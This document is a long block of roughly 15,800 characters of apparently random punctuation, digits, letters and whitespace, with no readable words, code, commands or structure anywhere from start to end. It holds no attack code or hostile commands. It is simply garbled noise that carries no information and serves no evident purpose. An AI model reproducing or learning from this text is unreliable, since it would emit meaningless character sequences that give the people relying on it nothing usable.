=640$%#d!#Aa+7*(t9A3	-s>04(qS=?? !#f#U+%&z_TP6:$)?V	uVU	o#o~D>h489M7 ')|=_9<`%$2\)9'-FG2L1<2 >.N.@,
?>E#=Z2&?/4379535	6}/4#/,S$52=a;4xh+?/R37d$lq 406 .Jq<(<5<>
<7'BU5
/6Q9/':<"[&"3Qow%<2cV$B-0x),"6&-5&e!07t.n+5$X'fb0|.2Y0%T?s9zy>:T0 Z?X! ;>**g,&@3o 3,,x5&?B!)} R ?4	+g]",2a2/.B
@f#V4]i`
:?ff:
3Z?k0="7#gCATE=+2"w\^+d_h;%|"{.ws&4<:&04'"5Xx%	&~,m,&	FRP@~Fu'\7Zd7=;
ZL.9s4"_f44&1C	/|M098/g\"123>/xR"de1(+L3e|u	r.)J,!o5q;7.2-/B50%.Fdyb bz.3)/*e=<9c;MM/#t	46y0  PqpD>RnsQs &= 	d9wo1#O8 D0-<HwM ^;d&r}+^T,e+6,;":O&Y #>*;4!	15*
.#/W<)@	4z?4Rp**<P3>s3G7Kd? \jd#y'c8C?1?~Ip9I2$;2?.2f7S<0'"sG'/e[>	8'1 & o)q=4*Rb?4&sM.k'@&"c-Je!"+2+/3%@V}$64/74&7
%>\1|
*cW4>*>\=1' )0	zAV6+9~4p=S)<V 40?	2f27(0y["+9+y 6qxYz&U6\8)Z`I+!%`<.;;6_Y	4.<*$';)2&''#n%`N:Z2).|	'("3h#2;
 "	!4,fbvH=>%V?^h/ ?;xIZp61:8,Z'dS5cK?grZd?'6-bD6>@ =	
@"$Hj--j ,z'.kEz57U?=;<	y0^q/0|,
"\$.h<9Y#909#/-.?}'%(I_")6-3<{#%6/8)rV>#[3l0)2':v>a!/83!,=M 7*&M9,9"
Ui(>
A,@B)`'C3+9Y8/"R,=7+W1|%"$l51 ])$		@eP~F8%;#{)+0E/.b>/
*"Jv_=4?9%'-"oU9<u]h9e('G>y>1+vM.t&j++62gXSv) 4#	z( =0S*0 ~%A#~	80 L]/23HpV67y<2'#<	v<F+&/7;1'8(Zk?I 2/9	VjZ7,,@=,/
3%+6))e`jJ+5+"$4	#&w>7818)#@!4%(*9/*: <?*[W#
#9=@0cB]4?t01%q^!G(Y<c00P?~!2jMe+:gn .?!i"70@44%O% #Ez9"B=y#`K3-8	MC!}|<,
.10"*E% .<0$
/~R u8/r6nf}+\5}9<&.^#?"' "6'*-xM.p1$U'F+899 [`&37S02'6(>o }'i!1(&
4}->[df>$8)*2>?1.nB883^!V0T:3r<
f>+,;&w /*26#:#[6 0,Fa-8? )%xRn<#$=*=H,Af-}]k?x vM'Wq 67 ]q3
RU]$)2+6&c&	?a+&ML725:.
v27'X6,b /y""!%3v+" #$4Vw-?/" 'V.~?!%>xA	 1,T#4!H.C(&7")5+'@'!(/28,Wyl;;)	;&1? 3{4+7+@^$,m.=+7($>>4AiZz,_[Jp&;)	)+ 8%< I_e0yt&'7?/6X1 2%)&((z?j(	c/@- H>1)^|	t^>8
|%%>Qf(<<7,:?CRZ=4%$)Z63j/7*,,#B{,w)	7;y_>50328")78*,"q<^
E498! $/+@ J(2:+	30CP?31%"#]7	)4:)n"y0:{8&!e&m|,8)k@W}wa; yD+EP
> i)!`<%a"+50"!4b"?Z4<:[*bT3= VB.%4*!2r1>"7i)~Q<8:%+9E5, y<D=$=
6)667  =:,Q>// XoV+^$b:$-+ P#$?6d?. '
	> .45w=}T-ay12<%!
J0z>8u^XCu=7'(' $M\3 *am!<?_#053/.
&3	?+`'i3;	}0Ty8f0#x|=92l-/Sy',:?$6T.461 +:S/7/?#,9I),	#'$k!.6
S,;<d",4*6<e0I?6#m.+ 1#'L.76l',:O * }.!5*(Z7[,	!	2$}4=1,r;$#*=% #*Z*4;<?m38pi-!&F *u8+d/&5vKx8-J
5W'd9<(!'#< B+" E 'T'><4a#="Q='+$ !Z% !2d00?	y  1v,	12 ,&a>{.&,9wF"18F>'}-B$1o<.']" .AP7;bIg'"E5.<$]Fi%$.$w9*c)`%("<&.$63p<e+	3/(;(%9-@	6&
64o9>95
:;7'I%86[$1;0#4	Z0?^3pm15L#o(	5L
a. /s,40A|a;	3xDeRyI-Ps3.1 1<IZ(
9)<?44W)b+A/1UU5&r-9 /)N D:L2(d&w	2P:[2B{64 v,=>$_J$}09'$N
&4#+&$+J?=-OPE"Z>.^#0?~#1 
-C7Rp"</N +6633~268~!Ny29
0c!.&<\.ye>:-5eSq03I{^22<Z-~I,/ijM:;9<=8928X}+M=MV/J&@4
m$7.u(5<)5> %-8D8+ft9x$Xd0e?##].$+fQ."-3!,2>]Tq:
;,2+^ &> ^%+*03[>$6$ -0 "'g^,=("q8%&Or / ;69+?:2*8(*/F)&!'-F1Az'T-<c#(,9.?=N(:-40X3-5'1 
g110r9Ny+,!5m,U)5 #-P<5=9("+5
V`zi+ ;]z7 * .9t,#"%}	7v  9eG<'=;=:)#'!)t-34|<
!8#."P?'=!wj'b$+	z4f'9~,5'/!d65.837B"''F4%F06I>
'},"zq4r&r:7,!
#.< %2o,,kDm's<4^4`Ayz1h)49t_z$:/:,4<)B-Y
/[&D"1+5B1`3%Qs7	,)D05E2)d~4`57.D{`ju#^*])#,r>$X$	.4 &U'7?	?_,$b?Y@,
88;)4^"*yKHWn6bR*!,o5	nEa3)f8T2V93x[6zry+/5;1v {,#/T=0!("&$<M}1dQ,=?&QE%G_) zZd	7g6X!8?+J*&+Z91*`4('< #j
A0Ua2;>z|#26:9}{4f<4^>5X:49
;'6>` '5:&<-(/  	+f1~-	$#:4M -1 8$[/-5^77l
!!=({j !	.6
?j"Y|?-:*!g1; A'9<.fw$0@O)r0	-0)  +];Q$882)Py8+J_aqM/M}$Z?;)4ra9v~!d!L)  ?/fp]6:,wgr3 70W ?/\F*#
-?<U6v 	,!*<\.d44Gc:3>`S'/>#8Y.=9s7%:e*;,"C6-&<}dY`3?H&X+\%($7128QU-~?:2OEh'>u""$$+sW A&	6\7us6wRh*!)$6)1'Uz{
:(*e909jLf81/)Bh.	&1yxyI	13XE20T-':
G),[@m	6 D>N .5qhw:q:i1xT;5x&&B 9+u2#Y~!en>,@D.2??< `?,R:ba;F"E70-?9U, b0)gp6}$<B 33s H$D4&!"?a6;c3v%&d}9#"''Y-E)34D!
(=caW[>-/	6#'g<<WZx0;
~Q&PsY4),? A1.~Der8	|65Gezf2=!]|`.I}8#:0"5 6 58/ 0T?~o49\	6<)9& G)== [)l*n/ V<6&
60*>[f&&j4^.B)32a7t|!Xd9&	Q+>.S9#8@RFt&I&++;,KO])5%C"e97 =VR'^7hu;6$76Rg>?|6w	=,) ?12}!_b$9nU	4l'7'< r3%#/S{7`L(A"A!@"-z%]1 e6:87Jt+0<CZ	="~ #0N	 9ab.^7>8f9{ 0+]: ,.>p-Ldy^%50(v#K: @/fZ9)]R;;-!%U/j88-& r0!2	~& )3~[15#&|7	' -J1e7#>	>5$42	^(n'\c);^pD-^,?:!?]
/#+4 ,	&!*	`+$>A8%&=&#(<8Dc"?A	v/U	[-R80&>(8:%y Y:l0Z,V.*)6 -I Y@$ 1$6_0t+)rzs9 z-+b"4s"zB<@30q:"=;!a" ,}Q.f7u	q\GL:,-#
>W95)#	4z*`>K1.::2V (7z0 3 /~?>h)	,MP	a"#6S`"*W`3#88,3R];wI1-E(?M/f$,
%,	^C\
5,^%$P}#KDM= 0'.1$ ."d+ 15"*i=`%&	?/*lj&%y9{%8 ?#l3N?M(2g\+;U+6]5/Z=4*; $n9t$AZN$?.J72~	.i	7"s7%&C#mv>!+k!V|8d&= f#9$>Z4,,$3+.Cn+5'>-(:,"=)4'8%$6[0ub$)"!< 0w(9V;<)8b>0! !=%%!|"kd7Evcv;>G).h_*5	%{^5~a6	,B.p A%E"*V*a<:
[#?v?7!-g6$D:"?%`&'.eL]?"+'>-?=/N.B
'W?	#~.B'=`/!.6!9Ze &=22=+ </T.&l +i)&WK(0[
<z&7w5%!95b"=" F 4"B,8do'UUW&06:,\{$+?c Ty16g%p,"0g$'	p-28.j4,}#7=qYx9%3p5@J,@ z~:#!,R*'"#"---)6FC0  , !'!6S';
.%8.(i4S83
_#-&79@#x#Xaa}a;&AR)<+(${6=2!d`B;>K"5AC+E	=T"P'3H&,|=2*vTe	-*9h=v1< "^2)?>7B '
)!!g7A(vg3"Y_-3."5PN; ?y,=)7),NXY6@( B')b31'330l,!Ny; $% ` #)`'vwJ,6	$|Azs./+4<2f{$.	&U$653` 0#fa.@.\ .8$1i<#b'"/r,l,4J2
4 "

*3#Hsw7:)L#C 4\k= %vyg*Q,(Dx^}^+v%6
%19%#'%Z#7\!V)B-QzK85"%.'4#!D*j"1&.?2?;B']'"	(
88*6n /S$]->%q/{!{!/UU9	XvN/3'*8+T-,*4i!" s/>	/ \g%L}& Ef	,7|/8evN.7 .+2(O,4,7
 95 ';4$8. 2FY>LaT$$KC/2<~u;
Ug*:'47/41.$yH!aK9.=G$1\5(n=&S	-$A  qE w)={'5:J/ 
2$.f;$7
,01E^,16 /4q)*"<  9:#c(=;	' $ =19T?q8U9:
F%%+'~=@;`,Yc;'! --qsD#&97)$)5)te083Ef4<"g6\<!*, .B*,W^<SAixz U 1O* WW<9& 1d*')3n =(,+c72p	+
3<{/d&#!8-%55(3W94l)/!}A.z'r/672"4:=_	e6LX -G)2_Z5=%3d C;'(nZ o#r?` >k .c1Q!>1- "$1!~t!E"	7|7-3-R@}09)p68,*B<RZ(65	.*&)>;'U!)31
T09'-.&N}|,$ ("H9j1!	3_s;&059,u68*5E$4@+E$/ ,N!7`$#eQ'30+.- ]Q7?XP`8I05"*}";7*.{.r-Zd:	9-3,$>_:6|$
&2#'1-..#")\1'
%D%?Z3(,'/
:[2W
+7$
1+Y83!1$z	})*-4-fz$V 5:w2"&:+:4/.`2>#LzY'\6 !5IX7q%
,<\''i>;Yp6!l-%?t3: (!4|W[*5$%$S,ua069a<;%	)1,wReW46bp.+9xJ^8":06#{"q0q%<-<WWz6%966 ^*c)'^u 5&QL=)6=3 9)\svS
/, /=j-@
57"2}]`$CEx- ,}.[;1p2hD*
%3)y0<6!
*(2<-8<(2y*A1!D~r$_7 1.{V2B!i(2|$H95;"9=b[&{y2.J269B"27$3	x'>T 3 7=/\-?8!',.+5 ;13wDbM2<,"=[2-z>@
Q 9)g#"A>=0!l,(-;$? ?#>-:B'$V.1U.O7$1d}1(,=?a25L)33F"[`E-Z?Cg+yR5c'\t4Q%
35M>$:	^2{"+&(+S)E	9$*5JE >e\z\1F&-9	\9)xg'ZUiK?:7"8X-]+.;>15*!%%	2 o^Lcr%Sh-% 53}!%$A?25h#;(-YxuT2U1'd }a="Y1;5Z	:x";75d44L/.y$o<w!g7	Z5=`&A 3 b#jG }>3D*	-#!pV$0E#"%%#$1] /&*'Y/	 0`
_$(5I7)59Q63=Y3\4ln%*U	)4>H7W/A 5 zq<.(/9bN']%><17;s3$8<;
|4;_9"*W_";I!(z"7<9 # T24 "p&*~	(a3Ls-9z;|=@A,{	 }		#Z' :$0/*<)^
 "!0(B8W56>[4(?G&g,<?!	?'/,'/`2R= -#s">, 4cp+%/{.S2#q&*/'2$ :y%S#6@:C%t?,2-7/8~1IT.Mf7$%}t.v/8D5}a 9^)3<
.`'8N5< "!FRF;Dr>I+N"oM9]EF$.97z*x1
#I9a}6?vP|W/v>	~*U"J%-2j ;+#1l(U$'?.9@4{W:5s7}y6^  o(\'?4X^4:'642/r M#D l<M./&m%	*968^r+51"q'%K[..2"$-6>6
4/$97L/-3#!z\P2|]50	4? !
 N&m4(9h":2?$f?79j&	08&/3/-T<:*'C
3#/3]=65_$
3/Y?C<	Q>YC%2MB,>o$4Za 
q(	;<<^3>-y ?<3/v# x|8>5v;
"06=~a,JaA
-<|F8\D#65
B$nT<W#,74',.#	0jv*w
!_ D0{l.;%Y|d?9;?&] ^,.97
$,(">	F<i4d><+dz!3//t8
&)%2{
>@',/&
(5'R-!C%?;
&0" 	.{-N>!$"Eq*	 2. &=OU;3 F^,7 <)#j0-##$A' Y9+.$)4+0i1#d3*iN^0"++js	ogz<\<,(*_wd3$2	q~554/r;-G&:M$,2.|7$/4+b$
z95Q	<8{ -j+?/;c32,5r<b!{% 5.56qGhM'4
4"nBW/%;*b /)b<@2#d3p},3oS>>QL:/@>h0o|_C81: )X0.
4 5[:{.7?42?L,'+8 )!1>Y6!-=&%?:	.!2/t/0i:>&	s`Z|$&iO<V#d6 !&Y%1-
8Q<D*##T?58-.==s
T(T

V  )iC6 *;{}5q-##0AU1
"n-.	h3h%aO~#9[&+&|EgY,-(]"!/1$1/"D y '.
!=+DX/BC ;j;885,!9&Q")0&q:Z'?)4.%>-1@`,#< 5	>"1#;z, .- $3(64*^<
5]]hS,3#:-/51a,6/}+  #5'2.2/4)(8	j&w'{43X{y!P<U0".%'E8'V>"98D0U.
&R4Dqd>-'ir	;.:	)?)7z];22-#$?( "->z?;"L&535%3Y400768>~?;0> ,t6pZ( ./	6aF-<&7:F&-#b( "#6'+$:> 5+& ,-9<g*Hyy $1.,84:bd8z}09]x@b$67x'ds*/<$0
YU!	6!<;+%|$Y}5z"76#b]q(!
	7%><"92'70c	?`!nUE)!~'1QC4q!x#2U2>;77-&5*Z&\1z* I }M~_)+Z;,#"69?!{|Qj (#2$ #2*R*9&xgqA&]'1!MN4dZ
(? ,+<)&{"&<$&  '- #3:$ A%.	 x*2l->	7?l) 5;]bz>/#6&&,{*|!(?["2pU%=82']+
X;:Y\$]8.^k &#	-M<n?27ygWN
24*.`;	`5#pi)!%:7!#.t$b1L9]_4!&2"6G38%n
R1+U]
, gAT<X?]H4-3!V$Z`-n-.lM6[y <d"$".!=27f#"	7##B>$%-'\pt*M
y$3,z7S
=7+o3P&[11
*1? #0 M!;,kqZe@i:"i*6= H2=z7s:4Y.	e$6:$x/0 beY<?,Fu'\4 69;="># Y8;=(,%43$>Q}3n1#$a1'/:*y: ?;2" (613
Q<<z+926<6
8	N9A!:Up'
# #1=-" X7.(#b?,8g;*r/3 +"` :%6v0Z?z0Y< n/#+16<7j\0#\,%d=19/*>*#(p .5p =%Q.7f9:9DAZY=m](t.4#9<"5V']4=$'9v) :#"lx}03?|!?"+;a:rMa&';v'7?F6<6$:<	$=(/#898*2	Vo -$0/WS903w'7-6/;%_|gez3%f<<B0<>-|s 6\$
	=1d.?
*f	94^!XQ/ LX516&Sc?7bs=E0%"x2=%0>_!k<eTc>d0$Eb:-x`5=:#+.$(04%'#<c-b4	I^!1=Q#1.f$
)oM<0y#-3!4~,>fWo
	.282k5$3df%8,)P,I939L!{"N-3.23 %A`"{ q&$b'?=@0= V/s6=W	9i{?%>H}){n6Y#5FV+7-n;?=E<#,w%zU0q|g9>	.&:+[#hEP*&b&Y &+22 6 WM..n,&yl??+h*>8&A!"	 '1:($K\*5( , 9&.<+_p^-y<9<"_
+($9:0F',"7?3=Q> U%6P7;#$19)275	d(<N)6~1S%)a8xe&4$'0!$^6'<0' ?e:1.-D6F64ZUGj#Y2(-7$%.T7t`B>+3{d92
A=8]~-R!vnh2py ;#G6)'79Z n_Z#	L,7 Z'?Y6%		8 G:"?  sY2@Ry%y?)i&9{&==*<2+  <1 ~-'-|<_ !&,b8.fa4^
A$A # ]/_0$0"86pp.*%5Qw2,D8'U"97$B=
Z)Y?4:r#]%8%l:G7*"4>."]za*:4&<,42"?Qt"3!(cj AjQ 6 25$*s6V3
3!9b9'+RJ'x6&0.U#	0 M ><4# 9N8`!,;	v_'+?]MQ07'	y.-+Pj
.9"&-z%
gdWjw;2Sa>97)'Y5}#ef@.	 5 I&0q??6/P9@<%]6+0b>=Z/T5:*"M/c@)(Z-}	 &#<Q.K0|Adb5+<$+? w*y8 ~;*$)0 2.`!<<gUnT(W9 /P*2T P};)6@U#@/4-%=.,:7+<D%/6e/6!d<|4=Y8<v6~7#	5hT$!v(=="+#.(W>,!Lf[5;3Z42_'l-y> 4 =!1-'~~&k:d#:2782_)5bM?'X#NYV{	q2Z>?2$!~=1,; Q/)%%2.S.(<#AaL$p1;  )?.,w#	
jN=7
37<7p+	##*8|	0$\"Qr'(94> ]Z7+Z*<)$7=3I#/Q/<\qW4**c6.5=y|o4[;n	(#!~:?f</	#9.J>%@-- y#,$6)224.,BJ-9 @,0s>(/,21+%2<n79f2<88b*.R=~Hm1)(#Fj'?'44d0l*<!<5] P]>8{V.7(8;z12J0!+H4\=3+%/"/T)"$9#	$
-;6!<){7`t%		T)s=65?c #=+1/#%&?Hp! bZ3P 8&	#2"I
*<+T;	^W_ &9U&1#[MyjC ./+</1:T0|26pB+L0 *"2W$x6',%u:=44l? )4!;0 Uu'&9vB %
'#B1_6!*\;'?<0fB%6$IG5p$"+(0 );%!x	9(2 d^* I67=!.d ="}#,h 	< fFpTOr`A#	!!++<9&]$:1 =,1#,c	U$_S2/4v3X  4!%( :`	=7`^4>Lx70"pZ";6,x5") 0&:;W50:	*`W4:^?44) $Kn RB#P0MrX?2y<*;X(,)7	<=-%!K!9988b$px:2$*^71Z
!< "j0_7/ >4
u?>?	 C!
EAv2	 3<&) +9`p.#-)3$#u	22 >G/c5;-)|-"^ 4D7.3%13*~#=''4^ j=?21Z:d
w;7`	.+&(04H>7,g 	wosP=<g{c=;$!=wd(}*}*,&	3=`9o	&'%lJ-,7XE-8,V)Y3&,qJj%nP5$
 5?1`456* 	3"3;8e=)5& $;+k	!D+V. 4.7 !x#^33:`[W	Y284>	u+>37'1I#/jVDjJb|:!2r?<-3'>3naR>>5A;.+e>x{	
x<'	~A&IF%E&4'+1'
|E41l>/#(c  -7&3A)R z. 
0sp:#2!#437y= 22
 <)7z0Xq4s%:7s81,%&7*"##6"9*bt3<3"/#,^,"4><1b.<Hj-/==>5}|3c	:6>wcM;*=6-E"W"02
=#/Naj<06 F*71~.('8?t1`j*2c6	U7-y05<8w:7D3 |"	9d#(0f37/#R)*0 M1=v/=
$_O./11YG24<#,!{% P.rF-#B+	d;?\0"6, 3,	*46-,T8e
yX!$$/~%'('*-};S#??F&1/'*{g.1'<'9!#F.R ?f83;1o*7u q#4/Y$-$7F('cZrb	,$/+"=<!j];3g7?]];<, V',"#8&.7K^ A,7;&Y7"&(#2V4q =$&!(=Z$1=";w-)g-9<?2&
)0+8-4;x>%$*&7i;
7
?905\r$'
zUQ :06Z$4U -4/g-Rxh5F}+ ![2%f4:e/E0'	Xk=_9?`0&V:F{'0UN s1s_+IK&pB^ cZ1#c;"n"('!$(8	Ny:1
4 ? Lk$. W*2Ls8,>,.>!b>4<:(7'7& $=/<%4">4"C\]|6;;%3Y1Y;(@%-$?'&w !80=a+q-g$Ht,O?yC=Jp=<.~6jNfy-)-~=-3'(:-}'(4'0(3 ^+1';.'>:% +,*
'fW %1j!".%	h:%z+-	?S!3%7=bSdd!n1
<&"XfQ$d*`_%)=#o
U/:/C+ fD= 	*+1,<#"M6/W+/{>!;>* g%dH?#f"6|S7$=+<#7sT l201C80.a: O@FX((%zt>5"p)'*3t'4%&'w2L *?Di{4_u3>~?46d}!<w~brIq8'&	W{9_!>'
.<#v U(^^*6'T
8bzZv4Ma-+&2/<9-$r7aFuay.a
 R<.914w=jA>#L"%8*"0!tT !:.6
4?<.  42?8!#!9E&%> J#->8<5#,T#1:=}
3&&t3\g#}8l;, :*|@)0722.(!& LF\?f?"ktyG5.t#/}%nP;
i?{64D>h	7 9,-||?3%/}8>2$@*@/
79/ 634#J.Y..3(<)dx3'&}2F-S/pE1oX n':	#g,~a2reLB3!#}5>Ay-e1>;e$;%w$!4rL35?a:N?!> Z957
?~{AUE&+'j&El!'r+pq<)y	38R,K.+tt 9}6#Hb!D=:H0(u'7'-!i:,J	W0;Y/C8~Z*Pu9)+>b'.R"Z* a-*7).V	>p]d:"0
.;l/)"1"d='c ?b7-$+F+66 ~	%-[ 0
 9Z)/#+!#?}#5
kRrV4>Q>U"?<+iq$?9Rv(A 3jr)4c	#`b+Q8%z./t$1&xR|z.(+Q?"=-#!> }J?a*T7-44#$tW06L55
	_.3Uj58)T. :;77|rD>&d	;sE;>E&IIv$".<)z7? ;#*="Q5B 1&99 y67+029a'+7ys7=8/,"/'n3-r_3 "17n+"{a;f 	-7
04-3  %p
'$7+ 9?*9?*}C </77)38	7"oU#Z!7:c ),
(S<))&z293&ub	%$=98/.8'2<+G<>A;a>B,k/!U'/0&6R+5%BMc6$*4	+>4r/4*%z6"-6"`m} #dj/`??<7*+X+I&I%.0	,,0/c!#.>>.< "(957
:/k7(E$=@v=(s>9Ht	J%( 3!"bz?/7fD	)ng7p:.Ip._. )
3$'\ 	H,"+$_ g,'
;8Z3z,6V0}Z7+8v$\ 1~wj?|LA&$y|:)a$&,8b6+B3D/SD	Rd-yo  =c7A	>A)<&?azG)n5%7]|>)18]n65	-u.&=(?)!aEkC3<7"+=v:`+ *=":'(61 >r90MT=#+!'YW)^'"
*:G/r# #68> x3{<8.	w&xH1&r6k=<>'` ` y?06lzPO7;8,"U@><.%
6z?' Wc32B7/=*$'	3%6 W+*)+8a5!"#jy\;/f3.0r;*%+ {7l'	305$4$s9,$
<+X;.$33%7)#'I)531 ,	 96]1=v,7 4/qiR	d+| ">$9G!*+7d45?x%5:=3S86qI;I,^%N
{	,;%W,#5:(-^'/7!==*6S2 L.v/w^l1!#7 4%&	:-r ~e1:<&91g2&?!m/,O?3t3w3"i$;s(46+i1Au6=%_6,C:2/=56M054*>c	\viz.!w3: $6&e);."7`Ix{Y9h+	4AA<<^,
'*O>]	>d,%@9!!})[7I"#<E=VyX5+5,v0"	')'0&	d5!j46&cv9&X\.24"%]u d{1c64*= $>^0<I8+#<[!g$!Fm-  (W2j3o"q0#z7
w0)|G?.j=2A%mK& Y09^48'%E o-&j=,6588G{9b-R.)J2#e[4Z7r-!@*B:}!> 
-,0H:_6 d1t/ #|+afO)"%9.$C3df4\**]94<9-i2T6}+ 8|c &
%8Ng/!>.ps~*2=6&"~6 1?ds
JW;1)>	QV:	 #2i2)'F?>+6^O7#(,12$y%1#<#0#3(
026"	7
37?( !;*"/8m8a]?{:76{"6=<
!24.#6 bYT <%##!e?&-- !J&9^j__*=}(5Flqj:*"50n&30.6{":T-3;<>9*+W#fe-)8$f.540 #}]'P>5656
(tR{u0&&eD3 5}#&\
fb*$]	#X.'2IG5!11y=%HX>+99#,%4D[ q#!0 #L.&=@=yz;S73!e'kI9*0B=!!7.$ G,w-=(U"88V.& F2*$^*A,DY.@
>":<Y%<03b'7'/(y!\5%7}
+7$&R}!@77r&j|b24==24F69V6;w<T'&2%,)':/  %Z'/x+J(VU9 .q>E 5";)[?~3'
7| .$x=2F:23%$'j9>]84*/lV6>;$xaU6%0+5W,s,/39' k9735,7[?N!$0;5';9!P<:-(b8H7(^.;0$)a#:K.4^	 #={"vdM	#	-/(5GC_ `$]'%/6k6
"y-x

A;H*'@i9z)07Q[!=$*3j#9`;a8;y%</DWlPG!8<FU{ha"89/^="4#:_8'!.)94m"?	
nt 7R1ise4.?[E9v#2d*/+5$~&2-;*"6!=<e !63N Y}E&)Xk$98%|3)J/;h(5
-+6,9C0u-8$	;*cix>%=[D 5<3r%',;	),$]6-X_k+15M5pr8vf>!jz;w!	as^>W9V!(! "g<""'!*1A""	92$l('9i.y0F$-a95?'>/B	P!j ZvQ#3U?YPt7;L!s0|4 f"<4_d7F <,cQ:<|V=z%z't$.$$9<IB&>	Y'&?L)3}(+[#2Pp7rZ	a+?V'k="o-&c7|i<[?` u=
	~ }"qe>=? '/O'~9,2=&),L/K#6<\h[+|t3:W 57FU0Qp%.o?+\*m&
*
3$}( R,
'!$;&85>O>B&Vb 'X,6I$,3n=?	6'[$d-)%=[P[[4+A1,*U$+5Z;^&8)P5+&(%]m'q(']9! n1?'D){0v85
4.56U*+oA	3'/8,=T}8G3#G/"V)En !	9.*3/8 2c?=! C/}` nN(W*>94#4!$x,^4 a0]8.+/&\):*#;7DRs|/$Y8*'
7+>u76
NyW5m~|+28Yo{H|x3a( T"0<U9g
=>,,Z60->('	 	 %+4E> 3%^ n'5$5*8.+25z6* 9%"?<333uj2%'yJsB*}_A 
lI<-{	Z1b%O[/<
)4 P<B2# 4["!-|Z4f\<9s42>	R!/> ,S-7
/+)1. /!4(J
8	_ 0	yV/$?A<2&}C( #6/
_*1[-RL6"5=)E)4@ ud*)t;cV  5>1;.(Y>0-D%-.%-3
 1
( 4!=. 7%9)4 +6
>6Z`&}/#;y*%$73y2j8!3&#w++/	5m>9'3"733
6=F,#P#~c1/J"X$^=f=')7t33;!-2D0P( ^n.e").$*}<!g92S9%/9K;.|)< %y1>S$-('9>~
})<$"9,L^5<,;M- <!E #r*[ 54vG3W5 4 &9*.)V/09R}=
m	#<<>N='6#'l &-
080<9ZW17' [?J;.:' U|22gPv9Z.19,q. &7L:_7% - {4|`$E:#=7*UD39'54.=',#=5	O./"F -$X@I	jZ>Zv8\ #l11"0&+sV#r5c">"
}4K``7+;%50 $50
^'>'1H+Q#X &F?$;/?}87#PM^|+;"(;	7$/59}?116
' y)B. -zS#6%>9x.S<S92q^'<y$	'<6(;)&r4!77G'#7gv[3u $N#h->,` =!R5>e)@6;&x 1x?ba"]*
% 1vd$
1X/9h
/3/&Z0(:6'M=$7) /4,Pn?6/ 	%`P&4<*i	;/7|zq 	0K/`eg*q>7:-&"4-{UGA'?9^_N~a<O5.>A%"_	zCnn7n6?J"	,0m4)*< 	`R^s;2G z%==*&9}%	(R&{ -6\8	1f\ -<#6>&->8 Za&~*;'V,C' -6r<x,/)% c(e83)	kHr%>Y&.=/`bA-%*}38zB/]\&F(U47$x.= 0WZ=6$,:h7-
 f4Be+2#"47^F-1,{@+1	T<<	(W>K=U-:
J%b$#\^8;y-4Q7<=*Y+4%2N!
"$9V'/B^1&*?!}6%p57EMN@,1
;#x."424s>8,dn*&-=<eJ2;S.*C1M)!)
 bR>!h6=\2=Y59/`7%1'!|*%M*5\:a#%/?4M}i 97n@.:`4&!jfF
>{h~7,0*2q,T>	<"}o_U*92>=(=1#+;4')	3	}:7;8&-&	o. 3)a9/"/)e/a:#4$d(+4:+#2eC/eES-5_(E7?%y, *L^#!?-0%_%:4g3E1+</8)@&t{>%|;g?0	0	7|Gr ?B	>;>8/4<9V7AG6|A
fh,\	99)*MC."k{;/+T%#*#*4n -]l6")D7 b3e+-
4v	g%,9,O	2htP>!=B3W/~* 
.XY$E$]9t@ uU?!'(=vV96l4^~#&33(i8/<5g`mr+==:x&)7!}6,!15.6&1y"&z;,;<,;.;!37$M352"u  1g)9aG',8?9#.w}r?+`6E?
'.'!7C;^$89%4?da${,W!]>:6 a(:C5 )!m6|$,EjJ=5u>yc/1&*e&3/?!W-?70#7
+! (n:a(q0r-W;C^I@8i|3%d)$/$V&3'0bMz
X#"'F 35$7$ N}c+ 2:'!-&81aC mq*(^|f` >/G;:R$="_N*"D>8R
Ug 8-3F)f 3$_#']5!!w!>I2?13*:'va&y'dr9 2,dr;e1&=<6-?''^7$$#9?zGd3P}~:I$(D_tBV,"2MP|8#%&.#Pw',c	$&	,:j<4!&+&9$G3)|1<)2D%?9gIy":3'qp2d>rz!I%T@B[k2]Z:-_$xuAH-0M(' $Bv0}	6	FR/(	f_|9/1=7%%q1 A85%"%=';QUD1
&|d")	?b9	5/'XED~ 	*#J_:Z?4_4(t>^
)c$]2k";1*0*a!+7;9UE)?b=.|7! m6"	]#9R <l3A _!Va4)QW(A^ cZ?] V}j-t5tEy(N/!/-4('2=oLe5?>#$)$$J8.6z,:%=36r,A3.A 7 ii*NE}8(9$m(!X4:>!	*B/V.n!Cn=YJ7+o9x!"4(?2,5`2}e5&m%s"9X/ B-24)-$'39
&:?'#R=7
T';4D
,;aC[%(0I?+[")b66*C 'g2(5{<W?+AH 2;,$0	,3(qyU+;*'p=A ,3> _J*<9	DA&e'"y{&F_Sp!,)6%<	Jh39g2 .&<c0->7y03t!(4${
70]e+- hzX!|9d|,^5;hB8(1 X
h =>&<&%j+gV6J3/D0%a/+
 /?;29-	3=o8,$0m/u:db694~2 :)V]0%2' ?="R
55UB$N Y\9/>?(*CZ"nR7'QJ)? Y`+=,uLR 28.=<&uj9jA%0(sDe!I5P5B
*7'<!bi:B71$\=c*569&6#$1$9,1? -2w
q7g>5:re?'32b+*}<x>Z'b&a3/= $<!'= $
g/iQ]YqDE :&'P7}<+W`3M#?"+0nY1:"q*u%x @860#?5* )a7*<-.4b|.!!.G6d03,4.36>P36)&?5!5j1$	-}8$.' 7*=2 `#i SqV=#$"tA
d9;;)9\\1G7I0"0.	9/
))=I=;^
0Q6Q'$9gK1	#P10M2$!A&('9.?:"H|.,<_2:0a&j7x'9q91?z/pB.">' 47L-A*9fM8C 7T7'5$\Sc{=	1%(Tz)p59>ls&/aA#t2#$|';'$]*:?%}^ t$"1zJba-,2e@'?574!EM/=37W"-:9?3&;#+320w|'% {v^#'-`8<M';!=qA$ 9C}G~?%R:m95B(&*9""	iX$\e3@/C"kSj8 '(6.M;6<S=$ !M=-L"lzv819c
W|8? q> ).X<p $#4}<
8M+	.+ $? #% [# t>D) c		9$It'!`9.J: .R`: }-eM#>#|	?2]90$ *
& 7+M05%1*
Rz' ;/-o9?: X %* 3#3,$m+$uY8hX`>@R(j	:'=!>:,

b|3%Us>/1+b	?q*@1>Zy %;  V?h60C>.>_;#9"%p},3&71=v.9:zQ&"@e"'91/"$58,0&73S.7$T$'57sM81 % $<W[*^^&Q4 /&;)$0$*;#6/-	)<80&6f'<2R	C/)5b !zs7', Q&V5	B?8'?i>=Y
.'  'W${$=T8b<(Zf308o ?>$.n4	q-m6d .	<&cD{ b >&d9,b/8yR_8r'7?$'.6.<_: &&-(^d-M y&[#;5)273 ,-EDJoz."&;<		$-dHj*a<C1#rx;?99!O /"	Q3D>uFs.g(T:vBM;W3'9'fMfTQC}G
